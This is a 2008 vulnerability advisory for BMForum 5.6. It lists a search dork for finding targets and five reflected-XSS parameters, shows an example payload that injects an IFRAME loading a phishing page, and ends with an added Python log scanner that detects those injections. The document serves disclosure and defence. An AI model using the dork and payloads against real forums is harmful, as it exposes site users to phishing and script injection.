==========================================================

      BMForum Remote 5.6 Multiple XSS Vulnerabilities

==========================================================



AUTHOR : CWH Underground

DATE   : 22 May 2008

SITE   : www.citec.us



#####################################################

 APPLICATION : BMForum

 VERSION     : 5.6 (Latest Version)

 VENDOR      : http://downloads.sourceforge.net/bmforum

#####################################################


DORK: "powered by BMForum"


---Exploit---


[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>

[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>

[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>

[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>

[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>


--- Note ---

 Very dangerous: the 'IFRAME' tag can be injected and used for phishing techniques.

 

 Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">
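
For defenders, a log check for the five script/parameter pairs listed above. This is an added example, not part of the original advisory: it assumes Apache/NGINX-style access-log lines, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path suffix -> parameters, exactly as listed in the advisory.
AFFECTED = {
    "/index.php": {"outpused"},
    "/newtem/footer/bsd01footer.php": {"footer_copyright", "verandproname"},
    "/newtem/header/bsd01header.php": {"topads", "myplugin"},
}
# Heuristic (assumption): a tag opener, an inline event handler, or a script URL scheme.
MARKUP = re.compile(r"<\s*[a-z!/]|\bon\w+\s*=|javascript:", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Constructed sample lines (documentation IP range, made-up forum path).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2008:10:00:01 +0000] "GET /forum/index.php?outpused=%3Ciframe%20src%3D//example.invalid%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [22/May/2008:10:00:02 +0000] "GET /forum/index.php?outpused=1 HTTP/1.1" 200 4801',
    '192.0.2.12 - - [22/May/2008:10:00:03 +0000] "GET /forum/newtem/header/bsd01header.php?topads=%253Cb%253Ex&myplugin=ok HTTP/1.1" 200 312',
    '192.0.2.13 - - [22/May/2008:10:00:04 +0000] "GET /forum/newtem/footer/bsd01footer.php?other=%3Cb%3E HTTP/1.1" 200 120',
]


def decode(value, rounds=3):
    """Undo several layers of percent-encoding so double-encoded input is seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def suspicious_params(request_target):
    """Return sorted (script, parameter) pairs from the advisory whose value carries markup."""
    parts = urlsplit(request_target)
    path = decode(parts.path).lower()
    hits = set()
    for suffix, params in AFFECTED.items():
        if not path.endswith(suffix):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name in params and MARKUP.search(decode(value)):
                hits.add((suffix, name))
    return sorted(hits)


def scan(log_lines):
    """Yield (line_number, hits) for every access-log line that matches."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits
```

The `/index.php` suffix also matches other applications' index pages, so scope the scan to the forum's virtual host or path when running it over real logs.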



##################################################################

# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #

##################################################################
